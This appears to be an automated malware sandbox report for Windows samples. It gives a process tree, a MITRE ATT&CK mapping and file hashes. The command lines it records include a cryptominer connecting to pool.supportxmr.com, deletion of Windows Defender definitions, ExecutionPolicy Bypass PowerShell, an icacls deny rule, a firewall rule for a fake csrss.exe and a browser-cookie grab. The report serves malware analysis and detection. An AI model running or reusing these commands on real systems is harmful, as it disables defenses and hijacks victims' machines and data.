"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2736

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:3052

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:516

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1912

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2024

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1976

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1100

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
PID:2352

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:276

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:580

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1592

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2240

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2904

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1156

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2156

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2136

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2940

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2932

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2132

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2372

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:924

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Suspicious use of WriteProcessMemory
PID:1320

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1668

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:916

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2096

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2632

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:564

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1384

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2564

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1296

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:1780

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:2304

C:\ProgramData\3759026.41
"C:\ProgramData\3759026.41"
2⤵
PID:2200

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 91DEDC46435300B151B7F3BA5638C1E9 C
2⤵
- Loads dropped DLL
PID:1580

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 865CDFAF9FA7262447C1A5A1B2DC866E C
2⤵
- Loads dropped DLL
PID:3016

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
- Executes dropped EXE
PID:2256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1613747855-16171241492077295934173085705512117645121224794546-805778251464068053"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:3036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "626820056185091933713906735251355806230665272911-261380988-1528939670-1879172573"
1⤵
- Executes dropped EXE
PID:2080

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5730542571742920401-55314992-889653185-2053383525-841540552-1784093268-1875124990"
1⤵
- Executes dropped EXE
PID:2612

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1408120063-1043811858-140267631743056673-909909379173119490311827060931561381274"
1⤵
- Executes dropped EXE
PID:2936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "73510021163798451917971281726100184401415190035-856352597-461431099-891589473"
1⤵
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12" "" "" "6d110b0a3" "0000000000000000" "00000000000003C8" "0000000000000594"
1⤵
PID:2768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-441151849557457890191073987-1882471909-92903641017504250631690611349744555866"
1⤵
PID:2800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-143622398840836826320391649831873154687764270136-19315713515506719701028529956"
1⤵
- Executes dropped EXE
PID:1264

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1950076531178863775983561688784450124179090878214143151868968222241051595676"
1⤵
- Executes dropped EXE
PID:3048

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1366356758-12577905001093954743-225417581-1206625607827840021195050083-1576486342"
1⤵
- Suspicious use of WriteProcessMemory
PID:2224

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-460081547-11155830951326772912168755533411457730082059901131-1665763519-1004811039"
1⤵
PID:2156

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-21057261641443241619-1229197215-1217384554738410334-21229353471790670143176379969"
1⤵
- Executes dropped EXE
PID:1380

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1080183811521362192791078198-1952109882999981475-357403628-1292185070-1345719564"
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3007175233427351661388010627-14384724501421380766-21324521766569584641504236982"
1⤵
- Executes dropped EXE
PID:2972

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Executes dropped EXE
PID:2376

C:\Users\Admin\AppData\Local\Temp\11EC.exe
C:\Users\Admin\AppData\Local\Temp\11EC.exe
1⤵
PID:1592

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0ff2347e-3473-4d62-b774-dbf20583fd1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:1776

C:\Users\Admin\AppData\Local\Temp\11EC.exe
"C:\Users\Admin\AppData\Local\Temp\11EC.exe" --Admin IsNotAutoStart IsNotTask
2⤵
PID:2580

C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin1.exe
"C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin1.exe"
3⤵
PID:2576

C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin1.exe
"C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin1.exe" --Admin
4⤵
PID:1056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
5⤵
PID:1868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
5⤵
PID:2032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps1
6⤵
PID:2340

C:\Program Files\Windows Defender\mpcmdrun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
5⤵
- Deletes Windows Defender Definitions
PID:1516

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
5⤵
PID:944

C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin2.exe
"C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin2.exe"
3⤵
PID:2372

C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin.exe
"C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin.exe"
3⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\updatewin.exe
4⤵
PID:1112

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:944

C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\5.exe
"C:\Users\Admin\AppData\Local\9150ff20-0d81-46bd-b7c0-f2017f476ac1\5.exe"
3⤵
PID:2648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 880
4⤵
- Program crash
PID:816

C:\Users\Admin\AppData\Local\Temp\74C4.exe
C:\Users\Admin\AppData\Local\Temp\74C4.exe
1⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo MFbR
2⤵
PID:2892

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
2⤵
- Blocklisted process makes network request
PID:2060

C:\Windows\SysWOW64\cmd.exe
cmd
3⤵
PID:2244

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab
4⤵
PID:1304

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
4⤵
- Runs ping.exe
PID:1168

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
Sui.com Benedetto.txt
4⤵
PID:2304

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
5⤵
PID:1312

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
6⤵
PID:680

C:\Users\Admin\AppData\Local\Temp\5D30.exe
C:\Users\Admin\AppData\Local\Temp\5D30.exe
1⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\7208.exe
C:\Users\Admin\AppData\Local\Temp\7208.exe
1⤵
PID:1596

C:\Users\Admin\AppData\Local\Temp\7208.exe
C:\Users\Admin\AppData\Local\Temp\7208.exe
2⤵
PID:2596

C:\Users\Admin\AppData\Local\Temp\90A0.exe
C:\Users\Admin\AppData\Local\Temp\90A0.exe
1⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:2056

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
PID:1752

C:\Users\Admin\AppData\Local\Temp\1D08.exe
C:\Users\Admin\AppData\Local\Temp\1D08.exe
1⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\1D08.exe
"C:\Users\Admin\AppData\Local\Temp\1D08.exe"
2⤵
PID:608

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:2116

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
PID:2292

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /15-15
3⤵
PID:2188

C:\Users\Admin\AppData\Local\Temp\B849.exe
C:\Users\Admin\AppData\Local\Temp\B849.exe
1⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\EBA9.exe
C:\Users\Admin\AppData\Local\Temp\EBA9.exe
1⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:2192

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:2764

C:\Windows\system32\taskeng.exe
taskeng.exe {FFA00F19-C6B1-4647-9B12-C5D083C34237} S-1-5-21-293278959-2699126792-324916226-1000:TUICJFPF\Admin:Interactive:[1]
1⤵
PID:2532

C:\Users\Admin\AppData\Local\0ff2347e-3473-4d62-b774-dbf20583fd1d\11EC.exe
C:\Users\Admin\AppData\Local\0ff2347e-3473-4d62-b774-dbf20583fd1d\11EC.exe --Task
2⤵
PID:2772

C:\Users\Admin\AppData\Roaming\ccjihwd
C:\Users\Admin\AppData\Roaming\ccjihwd
2⤵
PID:2900

C:\Users\Admin\AppData\Local\Temp\11FE.tmp.exe
C:\Users\Admin\AppData\Local\Temp\11FE.tmp.exe
1⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\2966.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2966.tmp.exe
1⤵
PID:896

C:\Users\Admin\AppData\Local\Temp\6B75.tmp.exe
C:\Users\Admin\AppData\Local\Temp\6B75.tmp.exe
1⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\9B9A.tmp.exe
C:\Users\Admin\AppData\Local\Temp\9B9A.tmp.exe
1⤵
PID:3008

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

File Permissions Modification

T1222

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\5549966.61
MD5
2d2d46e422f6b82997d224ab0713ff50

SHA1
15d72e08d6971a866b3ab3383919efee1eb43089

SHA256
c6f6bdfaa1e9527e7163aed82e5ee9587d8dc98252ff75611b01ef1bd77cd89b

SHA512
aacebd92805bdf627863b764fa0a8fd115c25b082987c1d2c21e9a7e8b11f8b84376930e78c296f5f3482b00d8202ec40898c7f3e51147e58ac5e841d90a349e

Download Submit
C:\ProgramData\5549966.61
MD5
2d2d46e422f6b82997d224ab0713ff50

SHA1
15d72e08d6971a866b3ab3383919efee1eb43089

SHA256
c6f6bdfaa1e9527e7163aed82e5ee9587d8dc98252ff75611b01ef1bd77cd89b

SHA512
aacebd92805bdf627863b764fa0a8fd115c25b082987c1d2c21e9a7e8b11f8b84376930e78c296f5f3482b00d8202ec40898c7f3e51147e58ac5e841d90a349e

Download Submit
C:\ProgramData\6461839.71
MD5
880fd252bc4e801e6170002efb6aef4d

SHA1
b10c102503f73acc57fc14326108e300fa94f8f5

SHA256
9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

SHA512
91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

Download Submit
C:\ProgramData\6834865.75
MD5
871d46ed9b2e230a77d28aa35698aec2

SHA1
42702c8f7497308cb3893134ba4453fe08217e65

SHA256
2b44e1e45443d676589522c3af1d3bcf593fc707f8b25289d9fb1e7b6d5e2537

SHA512
f1b8c390169f096a4815fb075736a90879a628c2f860bf554fdbe0074a8728a87b632e1b50fae74b610aa8217c4f08c56eeb359ad18bce97bb01783596d0d1e7

Download Submit
C:\ProgramData\6834865.75
MD5
871d46ed9b2e230a77d28aa35698aec2

SHA1
42702c8f7497308cb3893134ba4453fe08217e65

SHA256
2b44e1e45443d676589522c3af1d3bcf593fc707f8b25289d9fb1e7b6d5e2537

SHA512
f1b8c390169f096a4815fb075736a90879a628c2f860bf554fdbe0074a8728a87b632e1b50fae74b610aa8217c4f08c56eeb359ad18bce97bb01783596d0d1e7

Download Submit
C:\ProgramData\7687336.84
MD5
3db0a62356dc77e5827ca74d2262b061

SHA1
2256684a6c2bcbdb54f6c28c007068d8a13935d8

SHA256
f15e2ce4488ea5173521beb6522147d5102d2ec924670a7e0e7e4bc57c287f51

SHA512
c3bf41fbad98faa8fd2b08a16039e8e1d2cdc9500b2677c7e0870a5a114a1c395a6e002d727bb47f6a2bdf8a3305a9f80d18415bcca07d9343c315d245b783a7

Download Submit
C:\ProgramData\7687336.84
MD5
3db0a62356dc77e5827ca74d2262b061

SHA1
2256684a6c2bcbdb54f6c28c007068d8a13935d8

SHA256
f15e2ce4488ea5173521beb6522147d5102d2ec924670a7e0e7e4bc57c287f51

SHA512
c3bf41fbad98faa8fd2b08a16039e8e1d2cdc9500b2677c7e0870a5a114a1c395a6e002d727bb47f6a2bdf8a3305a9f80d18415bcca07d9343c315d245b783a7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
03f28308e37c7d92e7a31cc08560be74

SHA1
b26130610ff4d4d872629ff54d9fc92856837142

SHA256
eadff22c52da7eb136d7ce6589fd472acb39fa8a1ddae2dc543fdbf7c7be08f1

SHA512
